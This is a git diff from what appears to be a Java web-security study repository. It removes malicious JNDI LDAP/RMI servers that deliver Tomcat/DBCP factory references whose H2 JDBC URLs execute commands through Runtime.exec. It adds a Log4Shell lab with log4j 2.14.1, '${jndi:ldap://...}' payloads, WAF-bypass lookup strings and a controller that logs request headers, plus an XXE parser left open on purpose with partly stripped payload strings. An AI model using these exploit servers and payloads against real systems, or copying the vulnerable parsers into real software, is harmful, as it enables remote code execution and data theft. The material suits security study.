a/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java b/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java deleted file mode 100644 index 65adc37..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java +++ /dev/null @@ -1,61 +0,0 @@ -package factory.trustSerialFalse; - -import com.unboundid.ldap.listener.InMemoryDirectoryServer; -import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; -import com.unboundid.ldap.listener.InMemoryListenerConfig; -import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; -import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; -import com.unboundid.ldap.sdk.Entry; -import com.unboundid.ldap.sdk.LDAPResult; -import com.unboundid.ldap.sdk.ResultCode; - -import javax.net.ServerSocketFactory; -import javax.net.SocketFactory; -import javax.net.ssl.SSLSocketFactory; -import java.net.InetAddress; - -public class ldapserver { - public static void main(String[] args) { - try { - InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig("dc=example,dc=com"); - config.setListenerConfigs(new InMemoryListenerConfig( - "listen", - InetAddress.getByName("0.0.0.0"), - 1389, - ServerSocketFactory.getDefault(), - SocketFactory.getDefault(), - (SSLSocketFactory) SSLSocketFactory.getDefault())); - - config.addInMemoryOperationInterceptor(new OperationInterceptor()); - InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); - System.out.println("[LDAP] Listening on 0.0.0.0:1389"); - ds.startListening(); - } catch (Exception e) { - e.printStackTrace(); - } - } - //tomcat-jdbc + h2 - //decodeReference 绕过decodeObject，打本地工厂 - public static class OperationInterceptor extends InMemoryOperationInterceptor { - - @Override - public void processSearchResult(InMemoryInterceptedSearchResult searchResult) { - String base = searchResult.getRequest().getBaseDN(); - Entry e = new Entry(base); - e.addAttribute("objectClass","javaNamingReference"); - - e.addAttribute("javaClassName", "javax.sql.DataSource"); - e.addAttribute("javaFactory","org.apache.tomcat.jdbc.pool.DataSourceFactory"); - String JDBC_URL = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd)\\;return \"1\"\\;}'\\;CALL EXEC ('calc')"; - e.addAttribute("javaReferenceAddress",new String[]{"/0/url/"+JDBC_URL,"/1/driverClassName/org.h2.Driver","/2/username/Squirt1e","/3/password/Squirt1e","/4/initialSize/1"}); - - - try { - searchResult.sendSearchEntry(e); - searchResult.setResult(new LDAPResult(0, ResultCode.SUCCESS)); - } catch (Exception ex) { - ex.printStackTrace(); - } - } - } -} diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java b/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java deleted file mode 100644 index bb0045b..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java +++ /dev/null @@ -1,48 +0,0 @@ -package factory.withJDBC.rmi; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; - -import javax.naming.NamingException; -import javax.naming.Reference; -import javax.naming.StringRefAddr; -import java.rmi.AlreadyBoundException; -import java.rmi.RemoteException; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -public class dbcp { - public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { - Registry registry = LocateRegistry.createRegistry(1099); - Reference reference = commons_dbcp2_RCE(); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); - registry.bind("Object", referenceWrapper); - - - } - - private static Reference tomcat_dbcp2_RCE(){ - return dbcpByFactory("org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory"); - } - private static Reference tomcat_dbcp1_RCE(){ - return dbcpByFactory("org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory"); - } - private static Reference commons_dbcp2_RCE(){ - return dbcpByFactory("org.apache.commons.dbcp2.BasicDataSourceFactory"); - } - private static Reference commons_dbcp1_RCE(){ - return dbcpByFactory("org.apache.commons.dbcp.BasicDataSourceFactory"); - } - private static Reference dbcpByFactory(String factory){ - Reference ref = new Reference("javax.sql.DataSource",factory,null); - String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" + - "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" + - "java.lang.Runtime.getRuntime().exec('calc')\n" + - "$$\n"; - ref.add(new StringRefAddr("driverClassName","org.h2.Driver")); - ref.add(new StringRefAddr("url",JDBC_URL)); - ref.add(new StringRefAddr("username","root")); - ref.add(new StringRefAddr("password","password")); - ref.add(new StringRefAddr("initialSize","1")); - return ref; - } -} diff --git a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java b/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java deleted file mode 100644 index dfd49ea..0000000 --- a/JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java +++ /dev/null @@ -1,36 +0,0 @@ -package factory.withJDBC.rmi; - -import com.sun.jndi.rmi.registry.ReferenceWrapper; - -import javax.naming.Reference; -import javax.naming.StringRefAddr; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -public class tomcat_dbcp { - public static void main(String[] args) throws Exception { - Registry registry = LocateRegistry.createRegistry(1099); - Reference reference = tomcat_JDBC_RCE(); - ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); - registry.bind("Object", referenceWrapper); - } - - - private static Reference tomcat_JDBC_RCE(){ - return dbcpByFactory("org.apache.tomcat.jdbc.pool.DataSourceFactory"); - } - private static Reference dbcpByFactory(String factory){ - Reference ref = new Reference("javax.sql.DataSource",factory,null); - String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" + - "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" + - "java.lang.Runtime.getRuntime().exec('calc')\n" + - "$$\n"; - ref.add(new StringRefAddr("driverClassName","org.h2.Driver")); - ref.add(new StringRefAddr("url",JDBC_URL)); - ref.add(new StringRefAddr("username","root")); - ref.add(new StringRefAddr("password","password")); - ref.add(new StringRefAddr("initialSize","1")); - return ref; - } - -} diff --git a/hessian/HessianStudy/.gitignore b/JNDI/Log4j2/.gitignore similarity index 100% rename from hessian/HessianStudy/.gitignore rename to JNDI/Log4j2/.gitignore diff --git a/hessian/dubbo/.idea/.gitignore b/JNDI/Log4j2/.idea/.gitignore similarity index 100% rename from hessian/dubbo/.idea/.gitignore rename to JNDI/Log4j2/.idea/.gitignore diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml b/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml new file mode 100644 index 0000000..4ea72a9 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml b/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml new file mode 100644 index 0000000..7ef04e2 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.ask.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml b/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml new file mode 100644 index 0000000..1f2ea11 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml b/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml new file mode 100644 index 0000000..8648f94 --- /dev/null +++ b/JNDI/Log4j2/.idea/copilot.data.migration.edit.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/hessian/dubbo/.idea/encodings.xml b/JNDI/Log4j2/.idea/encodings.xml similarity index 100% rename from hessian/dubbo/.idea/encodings.xml rename to JNDI/Log4j2/.idea/encodings.xml diff --git a/JNDI/JNDI_vul/.idea/misc.xml b/JNDI/Log4j2/.idea/misc.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/misc.xml rename to JNDI/Log4j2/.idea/misc.xml diff --git a/JNDI/Log4j2/.idea/vcs.xml b/JNDI/Log4j2/.idea/vcs.xml new file mode 100644 index 0000000..b2bdec2 --- /dev/null +++ b/JNDI/Log4j2/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/pom.xml b/JNDI/Log4j2/pom.xml new file mode 100644 index 0000000..4440633 --- /dev/null +++ b/JNDI/Log4j2/pom.xml @@ -0,0 +1,44 @@ + + + 4.0.0 + + com.test + Log4j2 + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + 2.14.1 + 2.15.0 + + + + + org.apache.logging.log4j + log4j-core + ${log4j2.version1} + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + org.springframework.boot + spring-boot-starter-logging + + + + + org.aspectj + aspectjweaver + 1.9.4 + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/src/main/java/com/example/App.java b/JNDI/Log4j2/src/main/java/com/example/App.java new file mode 100644 index 0000000..469545a --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/App.java @@ -0,0 +1,35 @@ +package com.example; + +import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; +import org.apache.logging.log4j.core.config.Configurator; + +public class App { + private static final Logger logger = LogManager.getLogger(App.class); + + public static void main(String[] args) { + /* 临时修改记录的日志等级 */ + Configurator.setLevel("com.example.App", Level.DEBUG); + + String username = "${sys:user.name}"; + String str2 = "${sys:java.version}"; + String vul = "${jndi:ldap://127.0.0.1:50389/b67a28}"; + vul = "${jndi:ldap://127.0.0.1:50389/7df78d}"; +// logger.trace("跟踪信息"); +// logger.debug("调试信息"); +// logger.info("应用启动"); +// logger.warn("警告示例"); +// logger.error("错误示例"); +// logger.fatal("致命错误示例"); +// logger.trace("{}", username); +// logger.info("{}", str2); + logger.info("{}", vul); +// logger.error("{}",vul); + try { + int x = 1 / 0; + } catch (Exception e) { + logger.error("发生异常", e); + } + } +} diff --git a/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java b/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java new file mode 100644 index 0000000..7232598 --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java @@ -0,0 +1,31 @@ +package com.example; + +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + + +public class BypassWaf { + private static final Logger logger = LogManager.getLogger(BypassWaf.class); + + public static void main(String[] args) { +// String test5 = "${a:\\-b}"; +// logger.error("{}", test5); +// String test2 = "${a:\\-b123:-xyz}"; +// logger.error("{}", test2); +// String test4 = "${a:\\-b123:-xyz:-qwe}"; +// logger.error("{}", test4); +// String test3 = "${a:-b}"; +// logger.error("{}", test3); +// String test6 = "${a:-b123:-xyz}"; +// logger.error("{}", test6); +// String test7 = "${a:b123:-xyz321:-qwe}"; +// logger.error("{}", test7); +// String test8 = "${sys:java.version:-xyz123}"; +// logger.error("{}", test8); +// String test1 = "${sys:${a:-j${proto:-a}va.version}}${d:e}"; +// logger.fatal("{}", test1); + String host = "ldap://127.0.0.1:50389/b67a28"; + String vul1 = String.format("${jndi:%s}", host); + logger.error("{}", vul1); + } +} diff --git a/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java b/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java new file mode 100644 index 0000000..bb2acba --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java @@ -0,0 +1,11 @@ +package com.example.spring; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class WebApplication { + public static void main(String[] args) { + SpringApplication.run(WebApplication.class, args); + } +} diff --git a/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java b/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java new file mode 100644 index 0000000..955ae0f --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java @@ -0,0 +1,31 @@ +package com.example.spring.controller; + +import com.example.App; +import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; +import org.apache.logging.log4j.core.config.Configurator; +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestParam; +import org.springframework.web.bind.annotation.ResponseBody; + +import javax.servlet.http.HttpServletRequest; + +@Controller +public class IndexController { + private static final Logger logger = LogManager.getLogger(IndexController.class); + + @RequestMapping("/") + @ResponseBody + public String index(@RequestParam(value = "name", defaultValue = "World") String name, HttpServletRequest request) { + Configurator.setLevel("com.example.spring.controller.IndexController", Level.DEBUG); + + String referer = request.getHeader("Referer"); + logger.error("Referer: {}", referer); + String header = request.getHeader("User-Agent"); + logger.error("User-Agent: {}", header); +// logger.error("Hello, {}", name); + return String.format("Hello, %s!", name); + } +} diff --git a/JNDI/Log4j2/src/main/java/com/example/tmp.java b/JNDI/Log4j2/src/main/java/com/example/tmp.java new file mode 100644 index 0000000..5d41b57 --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/tmp.java @@ -0,0 +1,21 @@ +package com.example; + +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import javax.naming.InitialContext; +import javax.naming.NamingException; + +public class tmp { + private static final Logger logger = LogManager.getLogger(tmp.class); + + public static void main(String[] args) throws NamingException { +// String url = "ldap://127.0.0.1:50389/7df78d"; +// InitialContext initialContext = new InitialContext(); +// initialContext.lookup(url); + + String message = "${jndi:ldap://127.0.0.1:50389/7df78d}"; + + logger.error("{}", message); + } +} diff --git a/JNDI/Log4j2/src/main/resources/application.yaml b/JNDI/Log4j2/src/main/resources/application.yaml new file mode 100644 index 0000000..ab8fc62 --- /dev/null +++ b/JNDI/Log4j2/src/main/resources/application.yaml @@ -0,0 +1,2 @@ +server: + port: 8005 \ No newline at end of file diff --git a/JNDI/Log4j2/src/main/resources/log4j2.xml b/JNDI/Log4j2/src/main/resources/log4j2.xml new file mode 100644 index 0000000..4daec91 --- /dev/null +++ b/JNDI/Log4j2/src/main/resources/log4j2.xml @@ -0,0 +1,37 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/hessian/dubbo/.gitignore "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" similarity index 100% rename from hessian/dubbo/.gitignore rename to "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/hessian/dubbo/.idea/misc.xml "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" similarity index 100% rename from hessian/dubbo/.idea/misc.xml rename to "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" diff --git a/hessian/HessianStudy/.idea/vcs.xml "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" similarity index 100% rename from hessian/HessianStudy/.idea/vcs.xml rename to "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" new file mode 100644 index 0000000..84992b0 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" @@ -0,0 +1,21 @@ + + 4.0.0 + com.test + SSRF + war + 1.0-SNAPSHOT + SSRF Maven Webapp + http://maven.apache.org + + + junit + junit + 3.8.1 + test + + + + SSRF + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" new file mode 100644 index 0000000..142def2 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" new file mode 100644 index 0000000..c38169b --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" @@ -0,0 +1,5 @@ + + +

Hello World!

+ + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" new file mode 100644 index 0000000..513ef52 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:30 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" new file mode 100644 index 0000000..148ba39 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:37 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" new file mode 100644 index 0000000..bf9ba3a --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:38 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/1.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/1.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/2.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/2.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dns.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dns.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" new file mode 100644 index 0000000..40a5cec --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" @@ -0,0 +1,127 @@ +package com.test.local; + +import org.apache.commons.digester3.Digester; +import org.dom4j.DocumentException; +import org.dom4j.io.SAXReader; +import org.jdom2.JDOMException; +import org.jdom2.input.SAXBuilder; +import org.w3c.dom.Document; +import org.w3c.dom.Node; +import org.w3c.dom.NodeList; +import org.xml.sax.InputSource; +import org.xml.sax.SAXException; +import org.xml.sax.XMLReader; +import org.xml.sax.helpers.DefaultHandler; +import org.xml.sax.helpers.XMLReaderFactory; + +import javax.xml.parsers.*; +import java.io.IOException; +import java.io.InputStream; +import java.io.StringReader; + +public class DocBuilder { + public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException { + String xml1 = "" + + "]>" + + "" + + "&xxe;" + + "webgoat" + + ""; + + // 报错抛出数据 + String xml2 = "\n" + + "\n" + + "\n" + + "%remote;%int;%send;\n" + + "]>"; + + //DNS探测 + String xml3 = "\n" + + "\n" + + "\n" + + "%remote;\n" + + "]>"; + + // 通过CDATA，读取包含特殊符号的文本 + String xml4 = " \n" + + " \n" + + " \n" + + "\"> \n" + + " \n" + + "%dtd; ]> \n" + + "\n" + + "&all;"; + + docBuilder(xml4); + } + + public static void docBuilder(String xml) throws ParserConfigurationException, IOException, SAXException { + InputStream inputStream = new java.io.ByteArrayInputStream(xml.getBytes()); + + DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); + DocumentBuilder builder = factory.newDocumentBuilder(); + + // 漏洞：未禁用外部实体 + Document doc = builder.parse(inputStream); + + // 遍历xml节点name和value + StringBuffer buf = new StringBuffer(); + NodeList rootNodeList = doc.getChildNodes(); + for (int i = 0; i < rootNodeList.getLength(); i++) { + Node rootNode = rootNodeList.item(i); + NodeList child = rootNode.getChildNodes(); + for (int j = 0; j < child.getLength(); j++) { + Node node = child.item(j); + buf.append(node.getNodeName() + ": " + node.getTextContent() + "\n"); + } + } + System.out.println(buf.toString()); +// System.out.println(doc); + System.out.println("Document parsed successfully"); + } + + public static void xmlReader(String xml) throws ParserConfigurationException, IOException, SAXException { + XMLReader xmlReader = XMLReaderFactory.createXMLReader(); + xmlReader.parse(new InputSource(new StringReader(xml))); + } + + public static void SAXBuilder(String xml) throws ParserConfigurationException, IOException, SAXException, JDOMException { + SAXBuilder builder = new SAXBuilder(); + // org.jdom2.Document document + builder.build(new InputSource(new StringReader(xml))); // cause xxe + } + + public static void SAXReader(String xml) throws DocumentException { + SAXReader reader = new SAXReader(); + // org.dom4j.Document document + reader.read(new InputSource(new StringReader(xml))); // cause xxe + } + + public static void SAXParser(String xml) throws ParserConfigurationException, SAXException, IOException { + SAXParserFactory spf = SAXParserFactory.newInstance(); + SAXParser parser = spf.newSAXParser(); + parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler()); + } + + public static void Digester(String xml) throws IOException, SAXException { + Digester digester = new Digester(); + Object parse = digester.parse(new StringReader(xml));// parse xml + } + + public static void docBuilderXinclude(String xml) throws ParserConfigurationException, IOException, SAXException { + DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); + dbf.setXIncludeAware(true); // 支持XInclude + dbf.setNamespaceAware(true); // 支持XInclude + DocumentBuilder db = dbf.newDocumentBuilder(); + StringReader sr = new StringReader(xml); + InputSource is = new InputSource(sr); + Document document = db.parse(is); // parse xml + + NodeList rootNodeList = document.getChildNodes(); + } + + +} diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/dser/Main.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/deser/Main.java" similarity index 100% rename from "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/dser/Main.java" rename to "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/deser/Main.java" diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" new file mode 100644 index 0000000..63aed70 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" @@ -0,0 +1,62 @@ +package com.test.pojo; + +public class Baka extends Object{ + public String name; + protected int gender; + private int age; + + public Baka() { + System.out.println("Baka⑨"); + } + + public Baka(String name, int gender, int age) { + this.name = name; + this.gender = gender; + this.age = age; + System.out.println(name + " " + gender + " " + age); + } + + public static void sit(String name) { + System.out.println("sit " + name); + } + + public void hello(String name) { + System.out.println("hello " + name); + } + + protected void hug(String name) { + System.out.println("hug " + name); + } + + private void kiss(String name) { + System.out.println("kiss " + name); + } + + private void kiss(String alias, String name) { + System.out.println("kiss " + alias + "(" + name + ")"); + } + + public String getName() { + return name; + } + + public void setName(String name) { + this.name = name; + } + + public int getGender() { + return gender; + } + + public void setGender(int gender) { + this.gender = gender; + } + + public int getAge() { + return age; + } + + public void setAge(int age) { + this.age = age; + } +} diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java" new file mode 100644 index 0000000..e8df6ba --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java" @@ -0,0 +1,4 @@ +package pojo; + +public class Student { +} diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" new file mode 100644 index 0000000..db80041 --- /dev/null +++ 